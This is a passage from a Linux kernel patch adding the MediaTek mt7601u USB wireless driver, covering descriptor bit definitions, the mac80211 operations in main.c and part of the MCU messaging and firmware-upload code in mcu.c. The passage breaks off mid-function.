MT_RXINFO_WAPI_KEY BIT(18) +#define MT_RXINFO_PN_LEN GENMASK(21, 19) +#define MT_RXINFO_SW_PKT_80211 BIT(22) +#define MT_RXINFO_TCP_SUM_BYPASS BIT(28) +#define MT_RXINFO_IP_SUM_BYPASS BIT(29) +#define MT_RXINFO_TCP_SUM_ERR BIT(30) +#define MT_RXINFO_IP_SUM_ERR BIT(31) + +#define MT_RXWI_CTL_WCID GENMASK(7, 0) +#define MT_RXWI_CTL_KEY_IDX GENMASK(9, 8) +#define MT_RXWI_CTL_BSS_IDX GENMASK(12, 10) +#define MT_RXWI_CTL_UDF GENMASK(15, 13) +#define MT_RXWI_CTL_MPDU_LEN GENMASK(27, 16) +#define MT_RXWI_CTL_TID GENMASK(31, 28) + +#define MT_RXWI_FRAG GENMASK(3, 0) +#define MT_RXWI_SN GENMASK(15, 4) + +#define MT_RXWI_RATE_MCS GENMASK(6, 0) +#define MT_RXWI_RATE_BW BIT(7) +#define MT_RXWI_RATE_SGI BIT(8) +#define MT_RXWI_RATE_STBC GENMASK(10, 9) +#define MT_RXWI_RATE_ETXBF BIT(11) +#define MT_RXWI_RATE_SND BIT(12) +#define MT_RXWI_RATE_ITXBF BIT(13) +#define MT_RXWI_RATE_PHY GENMASK(15, 14) + +#define MT_RXWI_GAIN_RSSI_VAL GENMASK(5, 0) +#define MT_RXWI_GAIN_RSSI_LNA_ID GENMASK(7, 6) +#define MT_RXWI_ANT_AUX_LNA BIT(7) + +#define MT_RXWI_EANT_ENC_ANT_ID GENMASK(7, 0) + +enum mt76_phy_type { + MT_PHY_TYPE_CCK, + MT_PHY_TYPE_OFDM, + MT_PHY_TYPE_HT, + MT_PHY_TYPE_HT_GF, +}; + +enum mt76_phy_bandwidth { + MT_PHY_BW_20, + MT_PHY_BW_40, +}; + +struct mt76_txwi { + __le16 flags; + __le16 rate_ctl; + + u8 ack_ctl; + u8 wcid; + __le16 len_ctl; + + __le32 iv; + + __le32 eiv; + + u8 aid; + u8 txstream; + __le16 ctl; +} __packed __aligned(4); + +#define MT_TXWI_FLAGS_FRAG BIT(0) +#define MT_TXWI_FLAGS_MMPS BIT(1) +#define MT_TXWI_FLAGS_CFACK BIT(2) +#define MT_TXWI_FLAGS_TS BIT(3) +#define MT_TXWI_FLAGS_AMPDU BIT(4) +#define MT_TXWI_FLAGS_MPDU_DENSITY GENMASK(7, 5) +#define MT_TXWI_FLAGS_TXOP GENMASK(9, 8) +#define MT_TXWI_FLAGS_CWMIN GENMASK(12, 10) +#define MT_TXWI_FLAGS_NO_RATE_FALLBACK BIT(13) +#define MT_TXWI_FLAGS_TX_RPT BIT(14) +#define MT_TXWI_FLAGS_TX_RATE_LUT BIT(15) + +#define MT_TXWI_RATE_MCS GENMASK(6, 0) +#define MT_TXWI_RATE_BW BIT(7) +#define MT_TXWI_RATE_SGI BIT(8) +#define MT_TXWI_RATE_STBC GENMASK(10, 9) +#define MT_TXWI_RATE_PHY_MODE GENMASK(15, 14) + +#define MT_TXWI_ACK_CTL_REQ BIT(0) +#define MT_TXWI_ACK_CTL_NSEQ BIT(1) +#define MT_TXWI_ACK_CTL_BA_WINDOW GENMASK(7, 2) + +#define MT_TXWI_LEN_BYTE_CNT GENMASK(11, 0) +#define MT_TXWI_LEN_PKTID GENMASK(15, 12) + +#define MT_TXWI_CTL_TX_POWER_ADJ GENMASK(3, 0) +#define MT_TXWI_CTL_CHAN_CHECK_PKT BIT(4) +#define MT_TXWI_CTL_PIFS_REV BIT(6) + +u32 mt76_mac_process_rx(struct mt7601u_dev *dev, struct sk_buff *skb, + u8 *data, void *rxi); +int mt76_mac_wcid_set_key(struct mt7601u_dev *dev, u8 idx, + struct ieee80211_key_conf *key); +void mt76_mac_wcid_set_rate(struct mt7601u_dev *dev, struct mt76_wcid *wcid, + const struct 
ieee80211_tx_rate *rate); + +int mt76_mac_shared_key_setup(struct mt7601u_dev *dev, u8 vif_idx, u8 key_idx, + struct ieee80211_key_conf *key); +u16 mt76_mac_tx_rate_val(struct mt7601u_dev *dev, + const struct ieee80211_tx_rate *rate, u8 *nss_val); +struct mt76_tx_status +mt7601u_mac_fetch_tx_status(struct mt7601u_dev *dev); +void mt76_send_tx_status(struct mt7601u_dev *dev, struct mt76_tx_status *stat); + +#endif diff --git a/drivers/net/wireless/mediatek/mt7601u/main.c b/drivers/net/wireless/mediatek/mt7601u/main.c new file mode 100644 index 000000000000..ced82abb414f --- /dev/null +++ b/drivers/net/wireless/mediatek/mt7601u/main.c @@ -0,0 +1,412 @@ +/* + * Copyright (C) 2014 Felix Fietkau + * Copyright (C) 2015 Jakub Kicinski + * + * This program is free software; you can redistribute it and/or modify + * it under the terms of the GNU General Public License version 2 + * as published by the Free Software Foundation + * + * This program is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + * GNU General Public License for more details. + */ + +#include "mt7601u.h" +#include "mac.h" +#include +#include + +static int mt7601u_start(struct ieee80211_hw *hw) +{ + struct mt7601u_dev *dev = hw->priv; + int ret; + + mutex_lock(&dev->mutex); + + ret = mt7601u_mac_start(dev); + if (ret) + goto out; + + ieee80211_queue_delayed_work(dev->hw, &dev->mac_work, + MT_CALIBRATE_INTERVAL); + ieee80211_queue_delayed_work(dev->hw, &dev->cal_work, + MT_CALIBRATE_INTERVAL); +out: + mutex_unlock(&dev->mutex); + return ret; +} + +static void mt7601u_stop(struct ieee80211_hw *hw) +{ + struct mt7601u_dev *dev = hw->priv; + + mutex_lock(&dev->mutex); + + cancel_delayed_work_sync(&dev->cal_work); + cancel_delayed_work_sync(&dev->mac_work); + mt7601u_mac_stop(dev); + + mutex_unlock(&dev->mutex); +} + +static int mt7601u_add_interface(struct ieee80211_hw *hw, + struct ieee80211_vif *vif) +{ + struct mt7601u_dev *dev = hw->priv; + struct mt76_vif *mvif = (struct mt76_vif *) vif->drv_priv; + unsigned int idx = 0; + unsigned int wcid = GROUP_WCID(idx); + + /* Note: for AP do the AP-STA things mt76 does: + * - beacon offsets + * - do mac address tricks + * - shift vif idx + */ + mvif->idx = idx; + + if (dev->wcid_mask[wcid / BITS_PER_LONG] & BIT(wcid % BITS_PER_LONG)) + return -ENOSPC; + dev->wcid_mask[wcid / BITS_PER_LONG] |= BIT(wcid % BITS_PER_LONG); + mvif->group_wcid.idx = wcid; + mvif->group_wcid.hw_key_idx = -1; + + return 0; +} + +static void mt7601u_remove_interface(struct ieee80211_hw *hw, + struct ieee80211_vif *vif) +{ + struct mt7601u_dev *dev = hw->priv; + struct mt76_vif *mvif = (struct mt76_vif *) vif->drv_priv; + unsigned int wcid = mvif->group_wcid.idx; + + dev->wcid_mask[wcid / BITS_PER_LONG] &= ~BIT(wcid % BITS_PER_LONG); +} + +static int mt7601u_config(struct ieee80211_hw *hw, u32 changed) +{ + struct mt7601u_dev *dev = hw->priv; + int ret = 0; + + mutex_lock(&dev->mutex); + + if (changed & IEEE80211_CONF_CHANGE_CHANNEL) { + ieee80211_stop_queues(hw); + ret = mt7601u_phy_set_channel(dev, &hw->conf.chandef); + ieee80211_wake_queues(hw); + } + + mutex_unlock(&dev->mutex); + + return ret; +} + +static void +mt76_configure_filter(struct ieee80211_hw *hw, unsigned int changed_flags, + unsigned int *total_flags, u64 multicast) +{ + struct mt7601u_dev *dev = hw->priv; + u32 flags = 0; + +#define MT76_FILTER(_flag, _hw) do { \ + flags |= *total_flags & FIF_##_flag; \ + 
dev->rxfilter &= ~(_hw); \ + dev->rxfilter |= !(flags & FIF_##_flag) * (_hw); \ + } while (0) + + mutex_lock(&dev->mutex); + + dev->rxfilter &= ~MT_RX_FILTR_CFG_OTHER_BSS; + + MT76_FILTER(FCSFAIL, MT_RX_FILTR_CFG_CRC_ERR); + MT76_FILTER(PLCPFAIL, MT_RX_FILTR_CFG_PHY_ERR); + MT76_FILTER(CONTROL, MT_RX_FILTR_CFG_ACK | + MT_RX_FILTR_CFG_CTS | + MT_RX_FILTR_CFG_CFEND | + MT_RX_FILTR_CFG_CFACK | + MT_RX_FILTR_CFG_BA | + MT_RX_FILTR_CFG_CTRL_RSV); + MT76_FILTER(PSPOLL, MT_RX_FILTR_CFG_PSPOLL); + + *total_flags = flags; + mt76_wr(dev, MT_RX_FILTR_CFG, dev->rxfilter); + + mutex_unlock(&dev->mutex); +} + +static void +mt7601u_bss_info_changed(struct ieee80211_hw *hw, struct ieee80211_vif *vif, + struct ieee80211_bss_conf *info, u32 changed) +{ + struct mt7601u_dev *dev = hw->priv; + + mutex_lock(&dev->mutex); + + if (changed & BSS_CHANGED_ASSOC) + mt7601u_phy_con_cal_onoff(dev, info); + + if (changed & BSS_CHANGED_BSSID) { + mt7601u_addr_wr(dev, MT_MAC_BSSID_DW0, info->bssid); + + /* Note: this is a hack because beacon_int is not changed + * on leave nor is any more appropriate event generated. + * rt2x00 doesn't seem to be bothered though. + */ + if (is_zero_ether_addr(info->bssid)) + mt7601u_mac_config_tsf(dev, false, 0); + } + + if (changed & BSS_CHANGED_BASIC_RATES) { + mt7601u_wr(dev, MT_LEGACY_BASIC_RATE, info->basic_rates); + mt7601u_wr(dev, MT_HT_FBK_CFG0, 0x65432100); + mt7601u_wr(dev, MT_HT_FBK_CFG1, 0xedcba980); + mt7601u_wr(dev, MT_LG_FBK_CFG0, 0xedcba988); + mt7601u_wr(dev, MT_LG_FBK_CFG1, 0x00002100); + } + + if (changed & BSS_CHANGED_BEACON_INT) + mt7601u_mac_config_tsf(dev, true, info->beacon_int); + + if (changed & BSS_CHANGED_HT || changed & BSS_CHANGED_ERP_CTS_PROT) + mt7601u_mac_set_protection(dev, info->use_cts_prot, + info->ht_operation_mode); + + if (changed & BSS_CHANGED_ERP_PREAMBLE) + mt7601u_mac_set_short_preamble(dev, info->use_short_preamble); + + if (changed & BSS_CHANGED_ERP_SLOT) { + int slottime = info->use_short_slot ? 
9 : 20; + + mt76_rmw_field(dev, MT_BKOFF_SLOT_CFG, + MT_BKOFF_SLOT_CFG_SLOTTIME, slottime); + } + + if (changed & BSS_CHANGED_ASSOC) + mt7601u_phy_recalibrate_after_assoc(dev); + + mutex_unlock(&dev->mutex); +} + +static int +mt76_wcid_alloc(struct mt7601u_dev *dev) +{ + int i, idx = 0; + + for (i = 0; i < ARRAY_SIZE(dev->wcid_mask); i++) { + idx = ffs(~dev->wcid_mask[i]); + if (!idx) + continue; + + idx--; + dev->wcid_mask[i] |= BIT(idx); + break; + } + + idx = i * BITS_PER_LONG + idx; + if (idx > 119) + return -1; + + return idx; +} + +static int +mt7601u_sta_add(struct ieee80211_hw *hw, struct ieee80211_vif *vif, + struct ieee80211_sta *sta) +{ + struct mt7601u_dev *dev = hw->priv; + struct mt76_sta *msta = (struct mt76_sta *) sta->drv_priv; + struct mt76_vif *mvif = (struct mt76_vif *) vif->drv_priv; + int ret = 0; + int idx = 0; + + mutex_lock(&dev->mutex); + + idx = mt76_wcid_alloc(dev); + if (idx < 0) { + ret = -ENOSPC; + goto out; + } + + msta->wcid.idx = idx; + msta->wcid.hw_key_idx = -1; + mt7601u_mac_wcid_setup(dev, idx, mvif->idx, sta->addr); + mt76_clear(dev, MT_WCID_DROP(idx), MT_WCID_DROP_MASK(idx)); + rcu_assign_pointer(dev->wcid[idx], &msta->wcid); + mt7601u_mac_set_ampdu_factor(dev); + +out: + mutex_unlock(&dev->mutex); + + return ret; +} + +static int +mt7601u_sta_remove(struct ieee80211_hw *hw, struct ieee80211_vif *vif, + struct ieee80211_sta *sta) +{ + struct mt7601u_dev *dev = hw->priv; + struct mt76_sta *msta = (struct mt76_sta *) sta->drv_priv; + int idx = msta->wcid.idx; + + mutex_lock(&dev->mutex); + rcu_assign_pointer(dev->wcid[idx], NULL); + mt76_set(dev, MT_WCID_DROP(idx), MT_WCID_DROP_MASK(idx)); + dev->wcid_mask[idx / BITS_PER_LONG] &= ~BIT(idx % BITS_PER_LONG); + mt7601u_mac_wcid_setup(dev, idx, 0, NULL); + mt7601u_mac_set_ampdu_factor(dev); + mutex_unlock(&dev->mutex); + + return 0; +} + +static void +mt7601u_sta_notify(struct ieee80211_hw *hw, struct ieee80211_vif *vif, + enum sta_notify_cmd cmd, struct ieee80211_sta *sta) +{ +} + +static void +mt7601u_sw_scan(struct ieee80211_hw *hw, + struct ieee80211_vif *vif, + const u8 *mac_addr) +{ + struct mt7601u_dev *dev = hw->priv; + + mt7601u_agc_save(dev); + set_bit(MT7601U_STATE_SCANNING, &dev->state); +} + +static void +mt7601u_sw_scan_complete(struct ieee80211_hw *hw, + struct ieee80211_vif *vif) +{ + struct mt7601u_dev *dev = hw->priv; + + mt7601u_agc_restore(dev); + clear_bit(MT7601U_STATE_SCANNING, &dev->state); +} + +static int +mt7601u_set_key(struct ieee80211_hw *hw, enum set_key_cmd cmd, + struct ieee80211_vif *vif, struct ieee80211_sta *sta, + struct ieee80211_key_conf *key) +{ + struct mt7601u_dev *dev = hw->priv; + struct mt76_vif *mvif = (struct mt76_vif *) vif->drv_priv; + struct mt76_sta *msta = sta ? (struct mt76_sta *) sta->drv_priv : NULL; + struct mt76_wcid *wcid = msta ? 
&msta->wcid : &mvif->group_wcid; + int idx = key->keyidx; + int ret; + + if (cmd == SET_KEY) { + key->hw_key_idx = wcid->idx; + wcid->hw_key_idx = idx; + } else { + if (idx == wcid->hw_key_idx) + wcid->hw_key_idx = -1; + + key = NULL; + } + + if (!msta) { + if (key || wcid->hw_key_idx == idx) { + ret = mt76_mac_wcid_set_key(dev, wcid->idx, key); + if (ret) + return ret; + } + + return mt76_mac_shared_key_setup(dev, mvif->idx, idx, key); + } + + return mt76_mac_wcid_set_key(dev, msta->wcid.idx, key); +} + +static int mt7601u_set_rts_threshold(struct ieee80211_hw *hw, u32 value) +{ + struct mt7601u_dev *dev = hw->priv; + + mt76_rmw_field(dev, MT_TX_RTS_CFG, MT_TX_RTS_CFG_THRESH, value); + + return 0; +} + +static int +mt76_ampdu_action(struct ieee80211_hw *hw, struct ieee80211_vif *vif, + enum ieee80211_ampdu_mlme_action action, + struct ieee80211_sta *sta, u16 tid, u16 *ssn, u8 buf_size) +{ + struct mt7601u_dev *dev = hw->priv; + struct mt76_sta *msta = (struct mt76_sta *) sta->drv_priv; + + WARN_ON(msta->wcid.idx > GROUP_WCID(0)); + + switch (action) { + case IEEE80211_AMPDU_RX_START: + mt76_set(dev, MT_WCID_ADDR(msta->wcid.idx) + 4, BIT(16 + tid)); + break; + case IEEE80211_AMPDU_RX_STOP: + mt76_clear(dev, MT_WCID_ADDR(msta->wcid.idx) + 4, + BIT(16 + tid)); + break; + case IEEE80211_AMPDU_TX_OPERATIONAL: + ieee80211_send_bar(vif, sta->addr, tid, msta->agg_ssn[tid]); + break; + case IEEE80211_AMPDU_TX_STOP_FLUSH: + case IEEE80211_AMPDU_TX_STOP_FLUSH_CONT: + break; + case IEEE80211_AMPDU_TX_START: + msta->agg_ssn[tid] = *ssn << 4; + ieee80211_start_tx_ba_cb_irqsafe(vif, sta->addr, tid); + break; + case IEEE80211_AMPDU_TX_STOP_CONT: + ieee80211_stop_tx_ba_cb_irqsafe(vif, sta->addr, tid); + break; + } + + return 0; +} + +static void +mt76_sta_rate_tbl_update(struct ieee80211_hw *hw, struct ieee80211_vif *vif, + struct ieee80211_sta *sta) +{ + struct mt7601u_dev *dev = hw->priv; + struct mt76_sta *msta = (struct mt76_sta *) sta->drv_priv; + struct ieee80211_sta_rates *rates; + struct ieee80211_tx_rate rate = {}; + + rcu_read_lock(); + rates = rcu_dereference(sta->rates); + + if (!rates) + goto out; + + rate.idx = rates->rate[0].idx; + rate.flags = rates->rate[0].flags; + mt76_mac_wcid_set_rate(dev, &msta->wcid, &rate); + +out: + rcu_read_unlock(); +} + +const struct ieee80211_ops mt7601u_ops = { + .tx = mt7601u_tx, + .start = mt7601u_start, + .stop = mt7601u_stop, + .add_interface = mt7601u_add_interface, + .remove_interface = mt7601u_remove_interface, + .config = mt7601u_config, + .configure_filter = mt76_configure_filter, + .bss_info_changed = mt7601u_bss_info_changed, + .sta_add = mt7601u_sta_add, + .sta_remove = mt7601u_sta_remove, + .sta_notify = mt7601u_sta_notify, + .set_key = mt7601u_set_key, + .conf_tx = mt7601u_conf_tx, + .sw_scan_start = mt7601u_sw_scan, + .sw_scan_complete = mt7601u_sw_scan_complete, + .ampdu_action = mt76_ampdu_action, + .sta_rate_tbl_update = mt76_sta_rate_tbl_update, + .set_rts_threshold = mt7601u_set_rts_threshold, +}; diff --git a/drivers/net/wireless/mediatek/mt7601u/mcu.c b/drivers/net/wireless/mediatek/mt7601u/mcu.c new file mode 100644 index 000000000000..fbb1986eda3c --- /dev/null +++ b/drivers/net/wireless/mediatek/mt7601u/mcu.c @@ -0,0 +1,534 @@ +/* + * (c) Copyright 2002-2010, Ralink Technology, Inc. 
+ * Copyright (C) 2014 Felix Fietkau + * Copyright (C) 2015 Jakub Kicinski + * + * This program is free software; you can redistribute it and/or modify + * it under the terms of the GNU General Public License version 2 + * as published by the Free Software Foundation + * + * This program is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + * GNU General Public License for more details. + */ + +#include +#include +#include +#include +#include + +#include "mt7601u.h" +#include "dma.h" +#include "mcu.h" +#include "usb.h" +#include "trace.h" + +#define MCU_FW_URB_MAX_PAYLOAD 0x3800 +#define MCU_FW_URB_SIZE (MCU_FW_URB_MAX_PAYLOAD + 12) +#define MCU_RESP_URB_SIZE 1024 + +static inline int firmware_running(struct mt7601u_dev *dev) +{ + return mt7601u_rr(dev, MT_MCU_COM_REG0) == 1; +} + +static inline void skb_put_le32(struct sk_buff *skb, u32 val) +{ + put_unaligned_le32(val, skb_put(skb, 4)); +} + +static inline void mt7601u_dma_skb_wrap_cmd(struct sk_buff *skb, + u8 seq, enum mcu_cmd cmd) +{ + WARN_ON(mt7601u_dma_skb_wrap(skb, CPU_TX_PORT, DMA_COMMAND, + MT76_SET(MT_TXD_CMD_INFO_SEQ, seq) | + MT76_SET(MT_TXD_CMD_INFO_TYPE, cmd))); +} + +static inline void trace_mt_mcu_msg_send_cs(struct mt7601u_dev *dev, + struct sk_buff *skb, bool need_resp) +{ + u32 i, csum = 0; + + for (i = 0; i < skb->len / 4; i++) + csum ^= get_unaligned_le32(skb->data + i * 4); + + trace_mt_mcu_msg_send(dev, skb, csum, need_resp); +} + +static struct sk_buff * +mt7601u_mcu_msg_alloc(struct mt7601u_dev *dev, const void *data, int len) +{ + struct sk_buff *skb; + + WARN_ON(len % 4); /* if length is not divisible by 4 we need to pad */ + + skb = alloc_skb(len + MT_DMA_HDR_LEN + 4, GFP_KERNEL); + skb_reserve(skb, MT_DMA_HDR_LEN); + memcpy(skb_put(skb, len), data, len); + + return skb; +} + +static int mt7601u_mcu_wait_resp(struct mt7601u_dev *dev, u8 seq) +{ + struct urb *urb = dev->mcu.resp.urb; + u32 rxfce; + int urb_status, ret, i = 5; + + while (i--) { + if (!wait_for_completion_timeout(&dev->mcu.resp_cmpl, + msecs_to_jiffies(300))) { + dev_warn(dev->dev, "Warning: %s retrying\n", __func__); + continue; + } + + /* Make copies of important data before reusing the urb */ + rxfce = get_unaligned_le32(dev->mcu.resp.buf); + urb_status = urb->status * mt7601u_urb_has_error(urb); + + ret = mt7601u_usb_submit_buf(dev, USB_DIR_IN, MT_EP_IN_CMD_RESP, + &dev->mcu.resp, GFP_KERNEL, + mt7601u_complete_urb, + &dev->mcu.resp_cmpl); + if (ret) + return ret; + + if (urb_status) + dev_err(dev->dev, "Error: MCU resp urb failed:%d\n", + urb_status); + + if (MT76_GET(MT_RXD_CMD_INFO_CMD_SEQ, rxfce) == seq && + MT76_GET(MT_RXD_CMD_INFO_EVT_TYPE, rxfce) == CMD_DONE) + return 0; + + dev_err(dev->dev, "Error: MCU resp evt:%hhx seq:%hhx-%hhx!\n", + MT76_GET(MT_RXD_CMD_INFO_EVT_TYPE, rxfce), + seq, MT76_GET(MT_RXD_CMD_INFO_CMD_SEQ, rxfce)); + } + + dev_err(dev->dev, "Error: %s timed out\n", __func__); + return -ETIMEDOUT; +} + +static int +mt7601u_mcu_msg_send(struct mt7601u_dev *dev, struct sk_buff *skb, + enum mcu_cmd cmd, bool wait_resp) +{ + struct usb_device *usb_dev = mt7601u_to_usb_dev(dev); + unsigned cmd_pipe = usb_sndbulkpipe(usb_dev, + dev->out_eps[MT_EP_OUT_INBAND_CMD]); + int sent, ret; + u8 seq = 0; + + if (test_bit(MT7601U_STATE_REMOVED, &dev->state)) + return 0; + + mutex_lock(&dev->mcu.mutex); + + if (wait_resp) + while (!seq) + seq = ++dev->mcu.msg_seq & 0xf; + + mt7601u_dma_skb_wrap_cmd(skb, seq, 
cmd); + + if (dev->mcu.resp_cmpl.done) + dev_err(dev->dev, "Error: MCU response pre-completed!\n"); + + trace_mt_mcu_msg_send_cs(dev, skb, wait_resp); + trace_mt_submit_urb_sync(dev, cmd_pipe, skb->len); + ret = usb_bulk_msg(usb_dev, cmd_pipe, skb->data, skb->len, &sent, 500); + if (ret) { + dev_err(dev->dev, "Error: send MCU cmd failed:%d\n", ret); + goto out; + } + if (sent != skb->len) + dev_err(dev->dev, "Error: %s sent != skb->len\n", __func__); + + if (wait_resp) + ret = mt7601u_mcu_wait_resp(dev, seq); +out: + mutex_unlock(&dev->mcu.mutex); + + consume_skb(skb); + + return ret; +} + +static int mt7601u_mcu_function_select(struct mt7601u_dev *dev, + enum mcu_function func, u32 val) +{ + struct sk_buff *skb; + struct { + __le32 id; + __le32 value; + } __packed __aligned(4) msg = { + .id = cpu_to_le32(func), + .value = cpu_to_le32(val), + }; + + skb = mt7601u_mcu_msg_alloc(dev, &msg, sizeof(msg)); + return mt7601u_mcu_msg_send(dev, skb, CMD_FUN_SET_OP, func == 5); +} + +int mt7601u_mcu_tssi_read_kick(struct mt7601u_dev *dev, int use_hvga) +{ + int ret; + + if (!test_bit(MT7601U_STATE_MCU_RUNNING, &dev->state)) + return 0; + + ret = mt7601u_mcu_function_select(dev, ATOMIC_TSSI_SETTING, + use_hvga); + if (ret) { + dev_warn(dev->dev, "Warning: MCU TSSI read kick failed\n"); + return ret; + } + + dev->tssi_read_trig = true; + + return 0; +} + +int +mt7601u_mcu_calibrate(struct mt7601u_dev *dev, enum mcu_calibrate cal, u32 val) +{ + struct sk_buff *skb; + struct { + __le32 id; + __le32 value; + } __packed __aligned(4) msg = { + .id = cpu_to_le32(cal), + .value = cpu_to_le32(val), + }; + + skb = mt7601u_mcu_msg_alloc(dev, &msg, sizeof(msg)); + return mt7601u_mcu_msg_send(dev, skb, CMD_CALIBRATION_OP, true); +} + +int mt7601u_write_reg_pairs(struct mt7601u_dev *dev, u32 base, + const struct mt76_reg_pair *data, int n) +{ + const int max_vals_per_cmd = INBAND_PACKET_MAX_LEN / 8; + struct sk_buff *skb; + int cnt, i, ret; + + if (!n) + return 0; + + cnt = min(max_vals_per_cmd, n); + + skb = alloc_skb(cnt * 8 + MT_DMA_HDR_LEN + 4, GFP_KERNEL); + if (!skb) + return -ENOMEM; + skb_reserve(skb, MT_DMA_HDR_LEN); + + for (i = 0; i < cnt; i++) { + skb_put_le32(skb, base + data[i].reg); + skb_put_le32(skb, data[i].value); + } + + ret = mt7601u_mcu_msg_send(dev, skb, CMD_RANDOM_WRITE, cnt == n); + if (ret) + return ret; + + return mt7601u_write_reg_pairs(dev, base, data + cnt, n - cnt); +} + +int mt7601u_burst_write_regs(struct mt7601u_dev *dev, u32 offset, + const u32 *data, int n) +{ + const int max_regs_per_cmd = INBAND_PACKET_MAX_LEN / 4 - 1; + struct sk_buff *skb; + int cnt, i, ret; + + if (!n) + return 0; + + cnt = min(max_regs_per_cmd, n); + + skb = alloc_skb(cnt * 4 + MT_DMA_HDR_LEN + 4, GFP_KERNEL); + if (!skb) + return -ENOMEM; + skb_reserve(skb, MT_DMA_HDR_LEN); + + skb_put_le32(skb, MT_MCU_MEMMAP_WLAN + offset); + for (i = 0; i < cnt; i++) + skb_put_le32(skb, data[i]); + + ret = mt7601u_mcu_msg_send(dev, skb, CMD_BURST_WRITE, cnt == n); + if (ret) + return ret; + + return mt7601u_burst_write_regs(dev, offset + cnt * 4, + data + cnt, n - cnt); +} + +struct mt76_fw_header { + __le32 ilm_len; + __le32 dlm_len; + __le16 build_ver; + __le16 fw_ver; + u8 pad[4]; + char build_time[16]; +}; + +struct mt76_fw { + struct mt76_fw_header hdr; + u8 ivb[MT_MCU_IVB_SIZE]; + u8 ilm[]; +}; + +static int __mt7601u_dma_fw(struct mt7601u_dev *dev, + const struct mt7601u_dma_buf *dma_buf, + const void *data, u32 len, u32 dst_addr) +{ + DECLARE_COMPLETION_ONSTACK(cmpl); + struct mt7601u_dma_buf buf = *dma_buf; /* 
we need to fake length */
+	__le32 reg;
+	u32 val;
+	int ret;
+
+	reg = cpu_to_le32(MT76_SET(MT_TXD_INFO_TYPE, DMA_PACKET) |
+			  MT76_SET(MT_TXD_INFO_D_PORT, CPU_TX_PORT) |
+			  MT76_SET(MT_TXD_INFO_LEN, len));
+	memcpy(buf.buf, &reg, sizeof(reg));
+	memcpy(buf.buf + sizeof(reg), data, len);
+	memset(buf.buf + sizeof(reg) + len, 0, 8);
+
+	ret = mt7601u_vendor_single_wr(dev, MT_VEND_WRITE_FCE,
+				       MT_FCE_DMA_ADDR, dst_addr);
+	if (ret)
+		return ret;
+	len = roundup(len, 4);
+	ret = mt7601u_vendor_single_wr(dev, MT_VEND_WRITE_FCE,
+				       MT_FCE_DMA_LEN, len << 16);
+	if (ret)
+		return ret;
+
+	buf.len = MT_DMA_HDR_LEN + len + 4;
+	ret = mt7601u_usb_submit_buf(dev, USB_DIR_OUT, MT_EP_OUT_INBAND_CMD,
+				     &buf, GFP_KERNEL,
+				     mt7601u_complete_urb, &cmpl);
+	if (ret)
+		return ret;
+
+	if (!wait_for_completion_timeout(&cmpl, msecs_to_jiffies(1000))) {
+		dev_err(dev->dev, "Error: firmware upload timed out\n");
+		usb_kill_urb(buf.urb);
+		return -ETIMEDOUT;
+	}
+	if (mt7601u_urb_has_error(buf.urb)) {
+		dev_err(dev->dev, "Error: firmware upload urb failed:%d\n",
+			buf.urb->status);
+		return buf.urb->status;
+	}
+
+	val = mt7601u_rr(dev, MT_TX_CPU_FROM_FCE_CPU_DESC_IDX);
+	val++;
+	mt7601u_wr(dev, MT_TX_CPU_FROM_FCE_CPU_DESC_IDX, val);
+
+	return 0;
+}
+
+static int
+mt7601u_dma_fw(struct mt7601u_dev *dev, struct mt7601u_dma_buf *dma_buf,
+	       const void *data, int len, u32 dst_addr)
+{
+	int n, ret;
+
+	if (len == 0)
+		return 0;
+
+	n = min(MCU_FW_URB_MAX_PAYLOAD, len);
+	ret = __mt7601u_dma_fw(dev, dma_buf, data, n, dst_addr);
+	if (ret)
+		return ret;
+
+	if (!mt76_poll_msec(dev, MT_MCU_COM_REG1, BIT(31), BIT(31), 500))
+		return -ETIMEDOUT;
+
+	return mt7601u_dma_fw(dev, dma_buf, data + n, len - n, dst_addr + n);
+}
+
+static int
+mt7601u_upload_firmware(struct mt7601u_dev *dev, const struct mt76_fw *fw)
+{
+	struct mt7601u_dma_buf dma_buf;
+	void *ivb;
+	u32 ilm_len, dlm_len;
+	int i, ret;
+
+	ivb = kmemdup(fw->ivb, sizeof(fw->ivb), GFP_KERNEL);
+	if (!ivb || mt7601u_usb_alloc_buf(dev, MCU_FW_URB_SIZE, &dma_buf)) {
+		ret = -ENOMEM;
+		goto error;
+	}
+
+	ilm_len = le32_to_cpu(fw->hdr.ilm_len) - sizeof(fw->ivb);
+	dev_dbg(dev->dev, "loading FW - ILM %u + IVB %zu\n",
+		ilm_len, sizeof(fw->ivb));
+	ret = mt7601u_dma_fw(dev, &dma_buf, fw->ilm, ilm_len, sizeof(fw->ivb));
+	if (ret)
+		goto error;
+
+	dlm_len = le32_to_cpu(fw->hdr.dlm_len);
+	dev_dbg(dev->dev, "loading FW - DLM %u\n", dlm_len);
+	ret = mt7601u_dma_fw(dev, &dma_buf, fw->ilm + ilm_len,
+			     dlm_len, MT_MCU_DLM_OFFSET);
+	if (ret)
+		goto error;
+
+	ret = mt7601u_vendor_request(dev, MT_VEND_DEV_MODE, USB_DIR_OUT,
+				     0x12, 0, ivb, sizeof(fw->ivb));
+	if (ret < 0)
+		goto error;
+	ret = 0;
+
+	for (i = 100; i && !firmware_running(dev); i--)
+		msleep(10);
+	if (!i) {
+		ret = -ETIMEDOUT;
+		goto error;
+	}
+
+	dev_dbg(dev->dev, "Firmware running!\n");
+error:
+	kfree(ivb);
+	mt7601u_usb_free_buf(dev, &dma_buf);
+
+	return ret;
+}
+
+static int mt7601u_load_firmware(struct mt7601u_dev *dev)
+{
+	const struct firmware *fw;
+	const struct mt76_fw_header *hdr;
+	int len, ret;
+	u32 val;
+
+	mt7601u_wr(dev, MT_USB_DMA_CFG, (MT_USB_DMA_CFG_RX_BULK_EN |
+					 MT_USB_DMA_CFG_TX_BULK_EN));
+
+	if (firmware_running(dev))
+		return 0;
+
+	ret = request_firmware(&fw, MT7601U_FIRMWARE, dev->dev);
+	if (ret)
+		return ret;
+
+	if (!fw || !fw->data || fw->size < sizeof(*hdr))
+		goto err_inv_fw;
+
+	hdr = (const struct mt76_fw_header *) fw->data;
+
+	if (le32_to_cpu(hdr->ilm_len) <= MT_MCU_IVB_SIZE)
+		goto err_inv_fw;
+
+	len = sizeof(*hdr);
+	len += le32_to_cpu(hdr->ilm_len);
+	len += 
